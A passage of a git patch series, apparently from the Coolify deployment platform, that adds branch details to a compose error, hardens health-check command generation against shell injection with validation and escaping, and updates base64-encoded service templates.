+                  description: 'The container mount path (not allowed for read-only storages).'
+                host_path:
+                  type: string
+                  nullable: true
+                  description: 'The host path (persistent only, not allowed for read-only storages).'
+                content:
+                  type: string
+                  nullable: true
+                  description: 'The file content (file only, not allowed for read-only storages).'
               type: object
       responses:
         '200':

From 1b0b230de20856defea3a4823a3ff36e9c816ad7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 15:39:24 +0100
Subject: [PATCH 075/213] fix(compose): include git branch in compose file not
 found error

Add the git branch to the "Docker Compose file not found" error message
to help diagnose cases where the file exists on one branch but not the
checked-out branch.
---
 app/Models/Application.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/app/Models/Application.php b/app/Models/Application.php
index 82e4d6311..4cc2dcf74 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1732,7 +1732,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
             $this->save();
 
             if (str($e->getMessage())->contains('No such file')) {
-                throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
+                throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
             }
             if (str($e->getMessage())->contains('fatal: repository') && str($e->getMessage())->contains('does not exist')) {
                 if ($this->deploymentType() === 'deploy_key') {
@@ -1793,7 +1793,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
             $this->base_directory = $initialBaseDirectory;
             $this->save();
 
-            throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
+            throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})<br><br>Check if you used the right extension (.yaml or .yml) in the compose file name.");
         }
     }
 

From 0ffcee7a4dcd24f92b5fab8c9c7be140b9532733 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 16:40:16 +0100
Subject: [PATCH 076/213] Squashed commit from
 '4fhp-investigate-os-command-injection'

---
 app/Jobs/ApplicationDeploymentJob.php         | 18 +++--
 templates/service-templates-latest.json       | 36 ++++++++-
 templates/service-templates.json              | 36 ++++++++-
 .../Unit/HealthCheckCommandInjectionTest.php  | 76 ++++++++++++++++++-
 4 files changed, 149 insertions(+), 17 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index f84cdceb9..cbec016e9 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2781,9 +2781,15 @@ private function generate_healthcheck_commands()
         // Handle CMD type healthcheck
         if ($this->application->health_check_type === 'cmd' && ! empty($this->application->health_check_command)) {
             $command = str_replace(["\r\n", "\r", "\n"], ' ', $this->application->health_check_command);
-            $this->full_healthcheck_url = $command;
 
-            return $command;
+            // Defense in depth: validate command at runtime (matches input validation regex)
+            if (! preg_match('/^[a-zA-Z0-9 \-_.\/:=@,+]+$/', $command) || strlen($command) > 1000) {
+                $this->application_deployment_queue->addLogEntry('Warning: Health check command contains invalid characters or exceeds max length. Falling back to HTTP healthcheck.');
+            } else {
+                $this->full_healthcheck_url = $command;
+
+                return $command;
+            }
         }
 
         // HTTP type healthcheck (default)
@@ -2804,16 +2810,16 @@ private function generate_healthcheck_commands()
             : null;
 
         $url = escapeshellarg("{$scheme}://{$host}:{$health_check_port}".($path ?? '/'));
-        $method = escapeshellarg($method);
+        $escapedMethod = escapeshellarg($method);
 
         if ($path) {
-            $this->full_healthcheck_url = "{$this->application->health_check_method}: {$scheme}://{$host}:{$health_check_port}{$path}";
+            $this->full_healthcheck_url = "{$method}: {$scheme}://{$host}:{$health_check_port}{$path}";
         } else {
-            $this->full_healthcheck_url = "{$this->application->health_check_method}: {$scheme}://{$host}:{$health_check_port}/";
+            $this->full_healthcheck_url = "{$method}: {$scheme}://{$host}:{$health_check_port}/";
         }
 
         $generated_healthchecks_commands = [
-            "curl -s -X {$method} -f {$url} > /dev/null || wget -q -O- {$url} > /dev/null || exit 1",
+            "curl -s -X {$escapedMethod} -f {$url} > /dev/null || wget -q -O- {$url} > /dev/null || exit 1",
         ];
 
         return implode(' ', $generated_healthchecks_commands);
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index bc05073d1..f22a2ab53 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -818,7 +818,7 @@
     "databasus": {
         "documentation": "https://databasus.com/installation?utm_source=coolify.io",
         "slogan": "Databasus is a free, open source and self-hosted tool to backup PostgreSQL, MySQL, and MongoDB.",
-        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYyLjE4LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9EQVRBQkFTVVNfNDAwNQogICAgdm9sdW1lczoKICAgICAgLSAnZGF0YWJhc3VzLWRhdGE6L2RhdGFiYXN1cy1kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcU8tJwogICAgICAgIC0gJ2h0dHA6Ly9sb2NhbGhvc3Q6NDAwNS9hcGkvdjEvc3lzdGVtL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiA1Cg==",
+        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYzLjE2LjInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9EQVRBQkFTVVNfNDAwNQogICAgdm9sdW1lczoKICAgICAgLSAnZGF0YWJhc3VzLWRhdGE6L2RhdGFiYXN1cy1kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcU8tJwogICAgICAgIC0gJ2h0dHA6Ly9sb2NhbGhvc3Q6NDAwNS9hcGkvdjEvc3lzdGVtL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiA1Cg==",
         "tags": [
             "postgres",
             "mysql",
@@ -1951,7 +1951,7 @@
     "heyform": {
         "documentation": "https://docs.heyform.net/open-source/self-hosting?utm_source=coolify.io",
         "slogan": "Allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls. No coding skills required.",
-        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfSEVZRk9STV84MDAwCiAgICAgIC0gJ0FQUF9IT01FUEFHRV9VUkw9JHtTRVJWSUNFX1VSTF9IRVlGT1JNfScKICAgICAgLSAnU0VTU0lPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF82NF9TRVNTSU9OfScKICAgICAgLSAnRk9STV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X0ZPUk19JwogICAgICAtICdNT05HT19VUkk9bW9uZ29kYjovL21vbmdvOjI3MDE3L2hleWZvcm0nCiAgICAgIC0gUkVESVNfSE9TVD1rZXlkYgogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfS0VZREJ9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo4MDAwIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBtb25nbzoKICAgIGltYWdlOiAncGVyY29uYS9wZXJjb25hLXNlcnZlci1tb25nb2RiOmxhdGVzdCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0tbW9uZ28tZGF0YTovZGF0YS9kYicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAiZWNobyAnb2snID4gL2Rldi9udWxsIDI+JjEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCiAga2V5ZGI6CiAgICBpbWFnZTogJ2VxYWxwaGEva2V5ZGI6bGF0ZXN0JwogICAgY29tbWFuZDogJ2tleWRiLXNlcnZlciAtLWFwcGVuZG9ubHkgeWVzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0tFWURCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWtleWRiLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0ga2V5ZGItY2xpCiAgICAgICAgLSAnLS1wYXNzJwogICAgICAgIC0gJyR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==",
+        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfSEVZRk9STV85MTU3CiAgICAgIC0gJ0FQUF9IT01FUEFHRV9VUkw9JHtTRVJWSUNFX1VSTF9IRVlGT1JNfScKICAgICAgLSAnU0VTU0lPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF82NF9TRVNTSU9OfScKICAgICAgLSAnRk9STV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X0ZPUk19JwogICAgICAtICdNT05HT19VUkk9bW9uZ29kYjovL21vbmdvOjI3MDE3L2hleWZvcm0nCiAgICAgIC0gUkVESVNfSE9TVD1rZXlkYgogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfS0VZREJ9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo5MTU3IHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBtb25nbzoKICAgIGltYWdlOiAncGVyY29uYS9wZXJjb25hLXNlcnZlci1tb25nb2RiOmxhdGVzdCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0tbW9uZ28tZGF0YTovZGF0YS9kYicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAiZWNobyAnb2snID4gL2Rldi9udWxsIDI+JjEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCiAga2V5ZGI6CiAgICBpbWFnZTogJ2VxYWxwaGEva2V5ZGI6bGF0ZXN0JwogICAgY29tbWFuZDogJ2tleWRiLXNlcnZlciAtLWFwcGVuZG9ubHkgeWVzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0tFWURCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWtleWRiLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0ga2V5ZGItY2xpCiAgICAgICAgLSAnLS1wYXNzJwogICAgICAgIC0gJyR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==",
         "tags": [
             "form",
             "builder",
@@ -1965,7 +1965,7 @@
         "category": "productivity",
         "logo": "svgs/heyform.svg",
         "minversion": "0.0.0",
-        "port": "8000"
+        "port": "9157"
     },
     "homarr": {
         "documentation": "https://homarr.dev?utm_source=coolify.io",
@@ -2041,6 +2041,21 @@
         "minversion": "0.0.0",
         "port": "80"
     },
+    "imgcompress": {
+        "documentation": "https://imgcompress.karimzouine.com?utm_source=coolify.io",
+        "slogan": "Offline image compression, conversion, and AI background removal for Docker homelabs.",
+        "compose": "c2VydmljZXM6CiAgaW1nY29tcHJlc3M6CiAgICBpbWFnZTogJ2thcmltejEvaW1nY29tcHJlc3M6MC42LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9JTUdDT01QUkVTU181MDAwCiAgICAgIC0gJ0RJU0FCTEVfTE9HTz0ke0RJU0FCTEVfTE9HTzotZmFsc2V9JwogICAgICAtICdESVNBQkxFX1NUT1JBR0VfTUFOQUdFTUVOVD0ke0RJU0FCTEVfU1RPUkFHRV9NQU5BR0VNRU5UOi1mYWxzZX0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NTAwMCcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwo=",
+        "tags": [
+            "compress",
+            "photo",
+            "server",
+            "metadata"
+        ],
+        "category": "media",
+        "logo": "svgs/imgcompress.png",
+        "minversion": "0.0.0",
+        "port": "5000"
+    },
     "immich": {
         "documentation": "https://immich.app/docs/overview/introduction?utm_source=coolify.io",
         "slogan": "Self-hosted photo and video management solution.",
@@ -2417,6 +2432,19 @@
         "minversion": "0.0.0",
         "port": "3000"
     },
+    "librespeed": {
+        "documentation": "https://github.com/librespeed/speedtest?utm_source=coolify.io",
+        "slogan": "Self-hosted lightweight Speed Test.",
+        "compose": "c2VydmljZXM6CiAgbGlicmVzcGVlZDoKICAgIGNvbnRhaW5lcl9uYW1lOiBsaWJyZXNwZWVkCiAgICBpbWFnZTogJ2doY3IuaW8vbGlicmVzcGVlZC9zcGVlZHRlc3Q6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTElCUkVTUEVFRF84MgogICAgICAtIE1PREU9c3RhbmRhbG9uZQogICAgICAtIFRFTEVNRVRSWT1mYWxzZQogICAgICAtIERJU1RBTkNFPWttCiAgICAgIC0gV0VCUE9SVD04MgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdjdXJsIDEyNy4wLjAuMTo4MiB8fCBleGl0IDEnCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIGludGVydmFsOiAxbTBzCiAgICAgIHJldHJpZXM6IDEK",
+        "tags": [
+            "speedtest",
+            "internet-speed"
+        ],
+        "category": "devtools",
+        "logo": "svgs/librespeed.png",
+        "minversion": "0.0.0",
+        "port": "82"
+    },
     "libretranslate": {
         "documentation": "https://libretranslate.com/docs/?utm_source=coolify.io",
         "slogan": "Free and open-source machine translation API, entirely self-hosted.",
@@ -4099,7 +4127,7 @@
     "seaweedfs": {
         "documentation": "https://github.com/seaweedfs/seaweedfs?utm_source=coolify.io",
         "slogan": "SeaweedFS is a simple and highly scalable distributed file system. Compatible with S3, with an admin web interface.",
-        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjA1JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfUzNfODMzMwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke1NFUlZJQ0VfVVNFUl9TM30nCiAgICAgIC0gJ0FXU19TRUNSRVRfQUNDRVNTX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfUzN9JwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLXMzLWRhdGE6L2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2Jhc2UtY29uZmlnLmpzb24KICAgICAgICB0YXJnZXQ6IC9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgY29udGVudDogIntcbiAgXCJpZGVudGl0aWVzXCI6IFtcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhbm9ueW1vdXNcIixcbiAgICAgIFwiYWN0aW9uc1wiOiBbXG4gICAgICAgIFwiUmVhZFwiXG4gICAgICBdXG4gICAgfSxcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhZG1pblwiLFxuICAgICAgXCJjcmVkZW50aWFsc1wiOiBbXG4gICAgICAgIHtcbiAgICAgICAgICBcImFjY2Vzc0tleVwiOiBcImVudjpBV1NfQUNDRVNTX0tFWV9JRFwiLFxuICAgICAgICAgIFwic2VjcmV0S2V5XCI6IFwiZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWVwiXG4gICAgICAgIH1cbiAgICAgIF0sXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIkFkbWluXCIsXG4gICAgICAgIFwiUmVhZFwiLFxuICAgICAgICBcIlJlYWRBY3BcIixcbiAgICAgICAgXCJMaXN0XCIsXG4gICAgICAgIFwiVGFnZ2luZ1wiLFxuICAgICAgICBcIldyaXRlXCIsXG4gICAgICAgIFwiV3JpdGVBY3BcIlxuICAgICAgXVxuICAgIH1cbiAgXVxufVxuIgogICAgZW50cnlwb2ludDogInNoIC1jICdcXFxuc2VkIFwicy9lbnY6QVdTX0FDQ0VTU19LRVlfSUQvJEFXU19BQ0NFU1NfS0VZX0lEL2dcIiAvYmFzZS1jb25maWcuanNvbiA+IC9iYXNlMS1jb25maWcuanNvbjsgXFxcbnNlZCBcInMvZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWS8kQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZL2dcIiAvYmFzZTEtY29uZmlnLmpzb24gPiAvY29uZmlnLmpzb247IFxcXG53ZWVkIHNlcnZlciAtZGlyPS9kYXRhIC1tYXN0ZXIucG9ydD05MzMzIC1zMyAtczMucG9ydD04MzMzIC1zMy5jb25maWc9L2NvbmZpZy5qc29uXFxcbidcbiIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDo4MzMzOyBbICQkPyAtbGUgOCBdJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgc2Vhd2VlZGZzLWFkbWluOgogICAgaW1hZ2U6ICdjaHJpc2x1c2Yvc2Vhd2VlZGZzOjQuMDUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9BRE1JTl8yMzY0NgogICAgICAtICdTRUFXRUVEX1VTRVJfQURNSU49JHtTRVJWSUNFX1VTRVJfQURNSU59JwogICAgICAtICdTRUFXRUVEX1BBU1NXT1JEX0FETUlOPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICBjb21tYW5kOgogICAgICAtIGFkbWluCiAgICAgIC0gJy1tYXN0ZXI9c2Vhd2VlZGZzLW1hc3Rlcjo5MzMzJwogICAgICAtICctYWRtaW5Vc2VyPSR7U0VBV0VFRF9VU0VSX0FETUlOfScKICAgICAgLSAnLWFkbWluUGFzc3dvcmQ9JHtTRUFXRUVEX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSAnLXBvcnQ9MjM2NDYnCiAgICAgIC0gJy1kYXRhRGlyPS9kYXRhJwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLWFkbWluLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6MjM2NDY7IFsgJCQ/IC1sZSA4IF0nCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHNlYXdlZWRmcy1tYXN0ZXI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkK",
+        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfUzNfODMzMwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke1NFUlZJQ0VfVVNFUl9TM30nCiAgICAgIC0gJ0FXU19TRUNSRVRfQUNDRVNTX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfUzN9JwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLXMzLWRhdGE6L2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2Jhc2UtY29uZmlnLmpzb24KICAgICAgICB0YXJnZXQ6IC9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgY29udGVudDogIntcbiAgXCJpZGVudGl0aWVzXCI6IFtcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhbm9ueW1vdXNcIixcbiAgICAgIFwiYWN0aW9uc1wiOiBbXG4gICAgICAgIFwiUmVhZFwiXG4gICAgICBdXG4gICAgfSxcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhZG1pblwiLFxuICAgICAgXCJjcmVkZW50aWFsc1wiOiBbXG4gICAgICAgIHtcbiAgICAgICAgICBcImFjY2Vzc0tleVwiOiBcImVudjpBV1NfQUNDRVNTX0tFWV9JRFwiLFxuICAgICAgICAgIFwic2VjcmV0S2V5XCI6IFwiZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWVwiXG4gICAgICAgIH1cbiAgICAgIF0sXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIkFkbWluXCIsXG4gICAgICAgIFwiUmVhZFwiLFxuICAgICAgICBcIlJlYWRBY3BcIixcbiAgICAgICAgXCJMaXN0XCIsXG4gICAgICAgIFwiVGFnZ2luZ1wiLFxuICAgICAgICBcIldyaXRlXCIsXG4gICAgICAgIFwiV3JpdGVBY3BcIlxuICAgICAgXVxuICAgIH1cbiAgXVxufVxuIgogICAgZW50cnlwb2ludDogInNoIC1jICdcXFxuc2VkIFwicy9lbnY6QVdTX0FDQ0VTU19LRVlfSUQvJEFXU19BQ0NFU1NfS0VZX0lEL2dcIiAvYmFzZS1jb25maWcuanNvbiA+IC9iYXNlMS1jb25maWcuanNvbjsgXFxcbnNlZCBcInMvZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWS8kQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZL2dcIiAvYmFzZTEtY29uZmlnLmpzb24gPiAvY29uZmlnLmpzb247IFxcXG53ZWVkIHNlcnZlciAtZGlyPS9kYXRhIC1tYXN0ZXIucG9ydD05MzMzIC1zMyAtczMucG9ydD04MzMzIC1zMy5jb25maWc9L2NvbmZpZy5qc29uXFxcbidcbiIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDo4MzMzOyBbICQkPyAtbGUgOCBdJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgc2Vhd2VlZGZzLWFkbWluOgogICAgaW1hZ2U6ICdjaHJpc2x1c2Yvc2Vhd2VlZGZzOjQuMTMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9BRE1JTl8yMzY0NgogICAgICAtICdTRUFXRUVEX1VTRVJfQURNSU49JHtTRVJWSUNFX1VTRVJfQURNSU59JwogICAgICAtICdTRUFXRUVEX1BBU1NXT1JEX0FETUlOPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICBjb21tYW5kOgogICAgICAtIGFkbWluCiAgICAgIC0gJy1tYXN0ZXI9c2Vhd2VlZGZzLW1hc3Rlcjo5MzMzJwogICAgICAtICctYWRtaW5Vc2VyPSR7U0VBV0VFRF9VU0VSX0FETUlOfScKICAgICAgLSAnLWFkbWluUGFzc3dvcmQ9JHtTRUFXRUVEX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSAnLXBvcnQ9MjM2NDYnCiAgICAgIC0gJy1kYXRhRGlyPS9kYXRhJwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLWFkbWluLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6MjM2NDY7IFsgJCQ/IC1sZSA4IF0nCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHNlYXdlZWRmcy1tYXN0ZXI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkK",
         "tags": [
             "object",
             "storage",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 49f1f126f..22d0d6d8c 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -818,7 +818,7 @@
     "databasus": {
         "documentation": "https://databasus.com/installation?utm_source=coolify.io",
         "slogan": "Databasus is a free, open source and self-hosted tool to backup PostgreSQL, MySQL, and MongoDB.",
-        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYyLjE4LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fREFUQUJBU1VTXzQwMDUKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RhdGFiYXN1cy1kYXRhOi9kYXRhYmFzdXMtZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXFPLScKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjQwMDUvYXBpL3YxL3N5c3RlbS9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=",
